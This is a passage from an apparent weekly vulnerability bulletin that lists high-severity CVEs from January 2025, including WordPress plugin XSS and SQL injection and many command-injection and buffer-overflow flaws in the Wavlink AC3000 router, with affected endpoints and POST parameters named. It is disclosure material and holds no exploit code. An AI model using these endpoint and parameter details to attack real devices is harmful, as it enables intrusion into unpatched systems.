Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Strx Strx Magic Floating Sidebar Maker allows Stored XSS.This issue affects Strx Magic Floating Sidebar Maker: from n/a through 1.4.1. | 2025-01-16 | 7.1 | CVE-2025-23827 |
| Swift Project--Swift ASN1 |
Swift ASN.1 can be caused to crash when parsing certain BER/DER constructions. This crash is caused by a confusion in the ASN.1 library itself which assumes that certain objects can only be provided in either constructed or primitive forms, and will trigger a preconditionFailure if that constraint isn't met. Importantly, these constraints are actually required to be true in DER, but that correctness wasn't enforced on the early node parser side so it was incorrect to rely on it later on in decoding, which is what the library did. These crashes can be triggered when parsing any DER/BER format object. There is no memory-safety issue here: the crash is a graceful one from the Swift runtime. The impact of this is that it can be used as a denial-of-service vector when parsing BER/DER data from unknown sources, e.g. when parsing TLS certificates. | 2025-01-15 | 7.5 | CVE-2025-0343 |
| Syed Amir Hussain--Custom Post |
Cross-Site Request Forgery (CSRF) vulnerability in Syed Amir Hussain Custom Post allows Stored XSS.This issue affects Custom Post: from n/a through 1.0. | 2025-01-16 | 7.1 | CVE-2025-23566 |
| Tarak Patel--Post Carousel & Slider |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Tarak Patel Post Carousel & Slider allows Reflected XSS.This issue affects Post Carousel & Slider: from n/a through 1.0.4. | 2025-01-15 | 7.1 | CVE-2025-22750 |
| Taras Dashkevych--Error Notification |
Cross-Site Request Forgery (CSRF) vulnerability in Taras Dashkevych Error Notification allows Cross Site Request Forgery.This issue affects Error Notification: from n/a through 0.2.7. | 2025-01-16 | 7.1 | CVE-2025-23902 |
| TechMix--Event Countdown Timer Plugin by TechMix |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in TechMix Event Countdown Timer Plugin by TechMix allows Reflected XSS.This issue affects Event Countdown Timer Plugin by TechMix: from n/a through 1.4. | 2025-01-16 | 7.1 | CVE-2025-23699 |
| Tenda--AC15 |
A vulnerability classified as critical has been found in Tenda AC15 15.13.07.13. This affects the function formSetDevNetName of the file /goform/SetDevNetName. The manipulation of the argument mac leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-01-19 | 8.8 | CVE-2025-0566 |
| Tenda--AC8 |
A vulnerability, which was classified as critical, has been found in Tenda AC8, AC10 and AC18 16.03.10.20. Affected by this issue is some unknown functionality of the file /goform/telnet of the component HTTP Request Handler. The manipulation leads to command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-01-17 | 7.2 | CVE-2025-0528 |
| Thorsten Krug--Multilang Contact Form |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Thorsten Krug Multilang Contact Form allows Reflected XSS.This issue affects Multilang Contact Form: from n/a through 1.5. | 2025-01-15 | 7.1 | CVE-2025-22795 |
| Tim Ridgway--Better Protected Pages |
Cross-Site Request Forgery (CSRF) vulnerability in Tim Ridgway Better Protected Pages allows Stored XSS.This issue affects Better Protected Pages: from n/a through 1.0. | 2025-01-16 | 7.1 | CVE-2025-23875 |
| trainingbusinesspros--WordPress CRM, Email & Marketing Automation for WordPress | Award Winner Groundhogg |
The WordPress CRM, Email & Marketing Automation for WordPress | Award Winner - Groundhogg plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the gh_big_file_upload() function in all versions up to, and including, 3.7.3.5. This makes it possible for authenticated attackers, with Author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2025-01-14 | 8.8 | CVE-2025-0394 |
| trustist--TRUSTist REVIEWer |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in trustist TRUSTist REVIEWer allows Reflected XSS.This issue affects TRUSTist REVIEWer: from n/a through 2.0. | 2025-01-13 | 7.1 | CVE-2025-22567 |
| Turcu Ciprian--Auto FTP |
Cross-Site Request Forgery (CSRF) vulnerability in Turcu Ciprian Auto FTP allows Stored XSS. This issue affects Auto FTP: from n/a through 1.0.1. | 2025-01-16 | 7.1 | CVE-2025-23793 |
| Tussendoor internet & marketing--Call me Now |
Cross-Site Request Forgery (CSRF) vulnerability in Tussendoor internet & marketing Call me Now allows Stored XSS.This issue affects Call me Now: from n/a through 1.0.5. | 2025-01-16 | 7.1 | CVE-2025-23745 |
| TYPO3--typo3 |
TYPO3 is a free and open source Content Management Framework. A vulnerability has been identified in the backend user interface functionality involving deep links. Specifically, this functionality is susceptible to Cross-Site Request Forgery (CSRF). Additionally, state-changing actions in downstream components incorrectly accepted submissions via HTTP GET and did not enforce the appropriate HTTP method. Successful exploitation of this vulnerability requires the victim to have an active session on the backend user interface and to be deceived into interacting with a malicious URL targeting the backend, which can occur under the following conditions: The user opens a malicious link, such as one sent via email. The user visits a compromised or manipulated website while the following settings are misconfigured: 1. `security.backend.enforceReferrer` feature is disabled, 2. `BE/cookieSameSite` configuration is set to lax or none. The vulnerability in the affected downstream component "Scheduler Module" allows attackers to trigger pre-defined command classes - which can lead to unauthorized import or export of data in the worst case. Users are advised to update to TYPO3 versions 11.5.42 ELTS which fixes the problem described. There are no known workarounds for this vulnerability. | 2025-01-14 | 8 | CVE-2024-55924 |
| TYPO3--typo3 |
TYPO3 is a free and open source Content Management Framework. A vulnerability has been identified in the backend user interface functionality involving deep links. Specifically, this functionality is susceptible to Cross-Site Request Forgery (CSRF). Additionally, state-changing actions in downstream components incorrectly accepted submissions via HTTP GET and did not enforce the appropriate HTTP method. Successful exploitation of this vulnerability requires the victim to have an active session on the backend user interface and to be deceived into interacting with a malicious URL targeting the backend, which can occur under the following conditions: The user opens a malicious link, such as one sent via email. The user visits a compromised or manipulated website while the following settings are misconfigured: 1. `security.backend.enforceReferrer` feature is disabled, 2. `BE/cookieSameSite` configuration is set to lax or none. The vulnerability in the affected downstream component "Extension Manager Module" allows attackers to retrieve and install 3rd party extensions from the TYPO3 Extension Repository - which can lead to remote code execution in the worst case. Users are advised to update to TYPO3 versions 11.5.42 ELTS, 12.4.25 LTS, 13.4.3 LTS which fix the problem described. | 2025-01-14 | 7.5 | CVE-2024-55921 |
| Typomedia Foundation--WordPress Custom Sidebar |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Typomedia Foundation WordPress Custom Sidebar allows Blind SQL Injection.This issue affects WordPress Custom Sidebar: from n/a through 2.3. | 2025-01-16 | 8.5 | CVE-2025-23912 |
| ultimatemember--Ultimate Member User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin |
The Ultimate Member - User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the search parameter in all versions up to, and including, 2.9.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-01-18 | 7.5 | CVE-2025-0308 |
| Unknown--Appointment Booking Calendar Plugin and Scheduling Plugin |
The Appointment Booking Calendar Plugin and Scheduling Plugin WordPress plugin before 1.1.23 export settings functionality exports data to a public folder, with an easily guessable file name, allowing unauthenticated attackers to access the exported files (if they exist). | 2025-01-13 | 7.5 | CVE-2024-12274 |
| Uri Weil--WP Order By |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Uri Weil WP Order By allows Reflected XSS.This issue affects WP Order By: from n/a through 1.4.2. | 2025-01-15 | 7.1 | CVE-2025-22765 |
| Venki--Supravizio BPM |
Venki Supravizio BPM through 18.0.1 was discovered to contain an arbitrary file upload vulnerability. An authenticated attacker may upload a malicious file, leading to remote code execution. | 2025-01-13 | 9.9 | CVE-2024-46479 |
| Venki--Supravizio BPM |
An NTLM hash leak in Venki Supravizio BPM up to 18.0.1 allows authenticated attackers with Application Administrator access to escalate privileges on the underlying host system. | 2025-01-13 | 8.4 | CVE-2024-46480 |
| Venki--Supravizio BPM |
The login page of Venki Supravizio BPM up to 18.1.1 is vulnerable to open redirect leading to reflected XSS. | 2025-01-13 | 7.2 | CVE-2024-46481 |
| Vertim Coders--Neon Product Designer |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Vertim Coders Neon Product Designer allows SQL Injection.This issue affects Neon Product Designer: from n/a through 2.1.1. | 2025-01-15 | 8.5 | CVE-2025-22799 |
| Viktoria Rei Bauer--WP-BlackCheck |
Cross-Site Request Forgery (CSRF) vulnerability in Viktoria Rei Bauer WP-BlackCheck allows Stored XSS.This issue affects WP-BlackCheck: from n/a through 2.7.2. | 2025-01-16 | 7.1 | CVE-2025-23511 |
| Vimal Ghorecha--RSS News Scroller |
Cross-Site Request Forgery (CSRF) vulnerability in Vimal Ghorecha RSS News Scroller allows Stored XSS.This issue affects RSS News Scroller: from n/a through 2.0.0. | 2025-01-16 | 7.1 | CVE-2025-23467 |
| Vincius Krolow--Twitter Post |
Cross-Site Request Forgery (CSRF) vulnerability in VinÃcius Krolow Twitter Post allows Stored XSS.This issue affects Twitter Post: from n/a through 0.1. | 2025-01-16 | 7.1 | CVE-2025-23654 |
| WAGO--750-8100 (Controller PFC100) |
An unauthenticated remote attacker can cause a DoS in the controller due to uncontrolled resource consumption. | 2025-01-16 | 7.5 | CVE-2018-25108 |
| Walter Cerrudo--MFPlugin |
Cross-Site Request Forgery (CSRF) vulnerability in Walter Cerrudo MFPlugin allows Stored XSS.This issue affects MFPlugin: from n/a through 1.3. | 2025-01-16 | 7.1 | CVE-2025-23660 |
| Wavlink--Wavlink AC3000 |
An os command injection vulnerability exists in the touchlist_sync.cgi touchlistsync() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted set of HTTP requests can lead to arbitrary code execution. An attacker can send an HTTP request to trigger this vulnerability. | 2025-01-14 | 10 | CVE-2024-34166 |
| Wavlink--Wavlink AC3000 |
A stack-based buffer overflow vulnerability exists in the touchlist_sync.cgi touchlistsync() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to arbitrary code execution. An attacker can send an HTTP request to trigger this vulnerability. | 2025-01-14 | 10 | CVE-2024-36258 |
| Wavlink--Wavlink AC3000 |
A buffer overflow vulnerability exists in the login.cgi Goto_chidx() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to stack-based buffer overflow. An attacker can make an unauthenticated HTTP request to trigger this vulnerability. | 2025-01-14 | 10 | CVE-2024-36290 |
| Wavlink--Wavlink AC3000 |
A firmware update vulnerability exists in the login.cgi functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to arbitrary firmware update. An attacker can send an unauthenticated message to trigger this vulnerability. | 2025-01-14 | 10 | CVE-2024-39608 |
| Wavlink--Wavlink AC3000 |
A static login vulnerability exists in the wctrls functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted set of network packets can lead to root access. An attacker can send packets to trigger this vulnerability. | 2025-01-14 | 10 | CVE-2024-39754 |
| Wavlink--Wavlink AC3000 |
Multiple OS command injection vulnerabilities exist in the login.cgi set_sys_init() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to arbitrary code execution. An attacker can make an unauthenticated HTTP request to trigger these vulnerabilities.A command injection vulnerability exists within the `restart_hour_value` POST parameter. | 2025-01-14 | 10 | CVE-2024-39759 |
| Wavlink--Wavlink AC3000 |
Multiple OS command injection vulnerabilities exist in the login.cgi set_sys_init() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to arbitrary code execution. An attacker can make an unauthenticated HTTP request to trigger these vulnerabilities.A command injection vulnerability exists within the `restart_min_value` POST parameter. | 2025-01-14 | 10 | CVE-2024-39760 |
| Wavlink--Wavlink AC3000 |
Multiple OS command injection vulnerabilities exist in the login.cgi set_sys_init() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to arbitrary code execution. An attacker can make an unauthenticated HTTP request to trigger these vulnerabilities.A command injection vulnerability exists within the `restart_week_value` POST parameter. | 2025-01-14 | 10 | CVE-2024-39761 |
| Wavlink--Wavlink AC3000 |
A command execution vulnerability exists in the adm.cgi set_TR069() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability. | 2025-01-14 | 9.1 | CVE-2024-21797 |
| Wavlink--Wavlink AC3000 |
A command injection vulnerability exists in the wireless.cgi AddMac() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability. | 2025-01-14 | 9.1 | CVE-2024-34544 |
| Wavlink--Wavlink AC3000 |
A buffer overflow vulnerability exists in the usbip.cgi set_info() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to stack-based buffer overflow. An attacker can make an authenticated HTTP request to trigger this vulnerability. | 2025-01-14 | 9.1 | CVE-2024-36272 |
| Wavlink--Wavlink AC3000 |
A command execution vulnerability exists in the qos.cgi qos_sta() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability. | 2025-01-14 | 9.1 | CVE-2024-36295 |
| Wavlink--Wavlink AC3000 |
A stack-based buffer overflow vulnerability exists in the wireless.cgi set_wifi_basic() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability. | 2025-01-14 | 9.1 | CVE-2024-36493 |
| Wavlink--Wavlink AC3000 |
A buffer overflow vulnerability exists in the adm.cgi rep_as_bridge() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to stack-based buffer overflow. An attacker can make an authenticated HTTP request to trigger this vulnerability. | 2025-01-14 | 9.1 | CVE-2024-37184 |
| Wavlink--Wavlink AC3000 |
An os command injection vulnerability exists in the adm.cgi set_ledonoff() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to arbitrary code execution. An attacker can make an authenticated HTTP request to trigger this vulnerability. | 2025-01-14 | 9.1 | CVE-2024-37186 |
| Wavlink--Wavlink AC3000 |
A buffer overflow vulnerability exists in the adm.cgi set_TR069() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to stack-based buffer overflow. An attacker can make an authenticated HTTP request to trigger this vulnerability. | 2025-01-14 | 9.1 | CVE-2024-37357 |
| Wavlink--Wavlink AC3000 |
An external config control vulnerability exists in the openvpn.cgi openvpn_client_setup() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability. | 2025-01-14 | 9.1 | CVE-2024-38666 |
| Wavlink--Wavlink AC3000 |
A firmware update vulnerability exists in the fw_check.sh functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to arbitrary firmware update. An attacker can perform a man-in-the-middle attack to trigger this vulnerability. | 2025-01-14 | 9 | CVE-2024-39273 |
| Wavlink--Wavlink AC3000 |
An external config control vulnerability exists in the nas.cgi set_smb_cfg() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability. | 2025-01-14 | 9.1 | CVE-2024-39280 |
| Wavlink--Wavlink AC3000 |
A buffer overflow vulnerability exists in the internet.cgi set_add_routing() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to stack-based buffer overflow. An attacker can make an authenticated HTTP request to trigger this vulnerability. | 2025-01-14 | 9.1 | CVE-2024-39288 |
| Wavlink--Wavlink AC3000 |
A buffer overflow vulnerability exists in the adm.cgi set_wzdgw4G() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to stack-based buffer overflow. An attacker can make an authenticated HTTP request to trigger this vulnerability. | 2025-01-14 | 9.1 | CVE-2024-39294 |
| Wavlink--Wavlink AC3000 |
A buffer overflow vulnerability exists in the qos.cgi qos_sta_settings() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to stack-based buffer overflow. An attacker can make an authenticated HTTP request to trigger this vulnerability. | 2025-01-14 | 9.1 | CVE-2024-39299 |
| Wavlink--Wavlink AC3000 |
A stack-based buffer overflow vulnerability exists in the wireless.cgi SetName() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability. | 2025-01-14 | 9.1 | CVE-2024-39357 |
| Wavlink--Wavlink AC3000 |
A buffer overflow vulnerability exists in the adm.cgi set_wzap() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to stack-based buffer overflow. An attacker can make an authenticated HTTP request to trigger this vulnerability. | 2025-01-14 | 9.1 | CVE-2024-39358 |
| Wavlink--Wavlink AC3000 |
A stack-based buffer overflow vulnerability exists in the wireless.cgi DeleteMac() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability. | 2025-01-14 | 9.1 | CVE-2024-39359 |
| Wavlink--Wavlink AC3000 |
An os command injection vulnerability exists in the nas.cgi remove_dir() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to arbitrary code execution. An attacker can make an authenticated HTTP request to trigger this vulnerability. | 2025-01-14 | 9.1 | CVE-2024-39360 |
| Wavlink--Wavlink AC3000 |
A cross-site scripting (xss) vulnerability exists in the login.cgi set_lang_CountryCode() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to a disclosure of sensitive information. An attacker can make an unauthenticated HTTP request to trigger this vulnerability. | 2025-01-14 | 9.6 | CVE-2024-39363 |
| Wavlink--Wavlink AC3000 |
An os command injection vulnerability exists in the firewall.cgi iptablesWebsFilterRun() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to arbitrary code execution. An attacker can make an authenticated HTTP request to trigger this vulnerability. | 2025-01-14 | 9.1 | CVE-2024-39367 |
| Wavlink--Wavlink AC3000 |
An arbitrary code execution vulnerability exists in the adm.cgi set_MeshAp() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to arbitrary code execution. An attacker can make an authenticated HTTP request to trigger this vulnerability. | 2025-01-14 | 9.1 | CVE-2024-39370 |
| Wavlink--Wavlink AC3000 |
An external config control vulnerability exists in the nas.cgi set_nas() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability. | 2025-01-14 | 9.1 | CVE-2024-39602 |
| Wavlink--Wavlink AC3000 |
A stack-based buffer overflow vulnerability exists in the wireless.cgi set_wifi_basic_mesh() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability. | 2025-01-14 | 9.1 | CVE-2024-39603 |
| Wavlink--Wavlink AC3000 |
A command execution vulnerability exists in the update_filter_url.sh functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can perform a man-in-the-middle attack to trigger this vulnerability. | 2025-01-14 | 9 | CVE-2024-39604 |
| Wavlink--Wavlink AC3000 |
A buffer overflow vulnerability exists in the adm.cgi rep_as_router() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to stack-based buffer overflow. An attacker can make an authenticated HTTP request to trigger this vulnerability. | 2025-01-14 | 9.1 | CVE-2024-39756 |
| Wavlink--Wavlink AC3000 |
A stack-based buffer overflow vulnerability exists in the wireless.cgi AddMac() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability. | 2025-01-14 | 9.1 | CVE-2024-39757 |
| Wavlink--Wavlink AC3000 |
Multiple OS command injection vulnerabilities exist in the internet.cgi set_add_routing() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.A command injection vulnerability exists in the `netmask` POST parameter. | 2025-01-14 | 9.1 | CVE-2024-39762 |
| Wavlink--Wavlink AC3000 |
Multiple OS command injection vulnerabilities exist in the internet.cgi set_add_routing() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.A command injection vulnerability exists in the `gateway` POST parameter. | 2025-01-14 | 9.1 | CVE-2024-39763 |
| Wavlink--Wavlink AC3000 |
Multiple OS command injection vulnerabilities exist in the internet.cgi set_add_routing() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.A command injection vulnerability exists in the `dest` POST parameter. | 2025-01-14 | 9.1 | CVE-2024-39764 |
| Wavlink--Wavlink AC3000 |
Multiple OS command injection vulnerabilities exist in the internet.cgi set_add_routing() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.A command injection vulnerability exists in the `custom_interface` POST parameter. | 2025-01-14 | 9.1 | CVE-2024-39765 |
| Wavlink--Wavlink AC3000 |
Multiple buffer overflow vulnerabilities exist in the internet.cgi set_qos() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to stack-based buffer overflow. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.This vulnerability exists in the `cli_name` POST parameter. | 2025-01-14 | 9.1 | CVE-2024-39768 |
| Wavlink--Wavlink AC3000 |
Multiple buffer overflow vulnerabilities exist in the internet.cgi set_qos() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to stack-based buffer overflow. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.This vulnerability exists in the `cli_mac` POST parameter. | 2025-01-14 | 9.1 | CVE-2024-39769 |
| Wavlink--Wavlink AC3000 |
Multiple buffer overflow vulnerabilities exist in the internet.cgi set_qos() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to stack-based buffer overflow. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.This vulnerability exists in the `en_enable` POST parameter. | 2025-01-14 | 9.1 | CVE-2024-39770 |
| Wavlink--Wavlink AC3000 |
A buffer overflow vulnerability exists in the adm.cgi set_sys_adm() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to stack-based buffer overflow. An attacker can make an authenticated HTTP request to trigger this vulnerability. | 2025-01-14 | 9.1 | CVE-2024-39774 |
| Wavlink--Wavlink AC3000 |
Multiple OS command injection vulnerabilities exist in the adm.cgi sch_reboot() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to a arbitrary code execution. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.A command injection vulnerability exists in the `restart_hour` POST parameter. | 2025-01-14 | 9.1 | CVE-2024-39781 |
| Wavlink--Wavlink AC3000 |
Multiple OS command injection vulnerabilities exist in the adm.cgi sch_reboot() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to a arbitrary code execution. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.A command injection vulnerability exists in the `restart_min` POST parameter. | 2025-01-14 | 9.1 | CVE-2024-39782 |
| Wavlink--Wavlink AC3000 |
Multiple OS command injection vulnerabilities exist in the adm.cgi sch_reboot() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to a arbitrary code execution. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.A command injection vulnerability exists in the `restart_week` POST parameter. | 2025-01-14 | 9.1 | CVE-2024-39783 |
| Wavlink--Wavlink AC3000 |
Multiple command execution vulnerabilities exist in the nas.cgi add_dir() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.A command injection vulnerability exists in the disk_part POST parameter. | 2025-01-14 | 9.1 | CVE-2024-39784 |
| Wavlink--Wavlink AC3000 |
Multiple command execution vulnerabilities exist in the nas.cgi add_dir() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.A command injection vulnerability exists in the adddir_name POST parameter. | 2025-01-14 | 9.1 | CVE-2024-39785 |
| Wavlink--Wavlink AC3000 |
Multiple directory traversal vulnerabilities exist in the nas.cgi add_dir() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to permission bypass. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.A directory traversal vulnerability exists within the `adddir_name` POST parameter. | 2025-01-14 | 9.1 | CVE-2024-39786 |
| Wavlink--Wavlink AC3000 |
Multiple directory traversal vulnerabilities exist in the nas.cgi add_dir() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to permission bypass. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.A directory traversal vulnerability exists within the `disk_part` POST parameter. | 2025-01-14 | 9.1 | CVE-2024-39787 |
| Wavlink--Wavlink AC3000 |
Multiple external config control vulnerabilities exist in the nas.cgi set_ftp_cfg() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to permission bypass. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.A configuration injection vulnerability exists within the `ftp_name` POST parameter. | 2025-01-14 | 9.1 | CVE-2024-39788 |
| Wavlink--Wavlink AC3000 |
Multiple external config control vulnerabilities exist in the nas.cgi set_ftp_cfg() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to permission bypass. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.A configuration injection vulnerability exists within the `ftp_port` POST parameter. | 2025-01-14 | 9.1 | CVE-2024-39789 |
| Wavlink--Wavlink AC3000 |
Multiple external config control vulnerabilities exist in the nas.cgi set_ftp_cfg() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to permission bypass. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.A configuration injection vulnerability exists within the `ftp_max_sessions` POST parameter. | 2025-01-14 | 9.1 | CVE-2024-39790 |
| Wavlink--Wavlink AC3000 |
Multiple external config control vulnerabilities exist in the nas.cgi set_nas() proftpd functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to permission bypass. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.A configuration injection vulnerability exists in the `ftp_name` POST parameter. | 2025-01-14 | 9.1 | CVE-2024-39793 |
| Wavlink--Wavlink AC3000 |
Multiple external config control vulnerabilities exist in the nas.cgi set_nas() proftpd functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to permission bypass. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.A configuration injection vulnerability exists in the `ftp_port` POST parameter. | 2025-01-14 | 9.1 | CVE-2024-39794 |
| Wavlink--Wavlink AC3000 |
Multiple external config control vulnerabilities exist in the nas.cgi set_nas() proftpd functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to permission bypass. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.A configuration injection vulnerability exists in the `ftp_max_sessions` POST parameter. | 2025-01-14 | 9.1 | CVE-2024-39795 |
| Wavlink--Wavlink AC3000 |
Multiple external config control vulnerabilities exists in the openvpn.cgi openvpn_server_setup() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.A configuration injection vulnerability exists in the `sel_open_protocol` POST parameter. | 2025-01-14 | 9.1 | CVE-2024-39798 |
| Wavlink--Wavlink AC3000 |
Multiple external config control vulnerabilities exists in the openvpn.cgi openvpn_server_setup() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.A configuration injection vulnerability exists in the `sel_open_interface` POST parameter. | 2025-01-14 | 9.1 | CVE-2024-39799 |
| Wavlink--Wavlink AC3000 |
Multiple external config control vulnerabilities exists in the openvpn.cgi openvpn_server_setup() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.A configuration injection vulnerability exists in the `open_port` POST parameter. | 2025-01-14 | 9.1 | CVE-2024-39800 |
| Wavlink--Wavlink AC3000 |
Multiple buffer overflow vulnerabilities exist in the qos.cgi qos_settings() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to stack-based buffer overflow. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.A buffer overflow vulnerability exists in the `qos_bandwidth` POST parameter. | 2025-01-14 | 9.1 | CVE-2024-39801 |
| Wavlink--Wavlink AC3000 |
Multiple buffer overflow vulnerabilities exist in the qos.cgi qos_settings() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to stack-based buffer overflow. An attacker can make an authenticated HTTP request to trigger these vulnerabilities.A buffer overflow vulnerability exists in the `qos_dat` POST parameter. | 2025-01-14 | 9.1 | CVE-2024-39802 |
| Wavlink--Wavlink AC3000 |
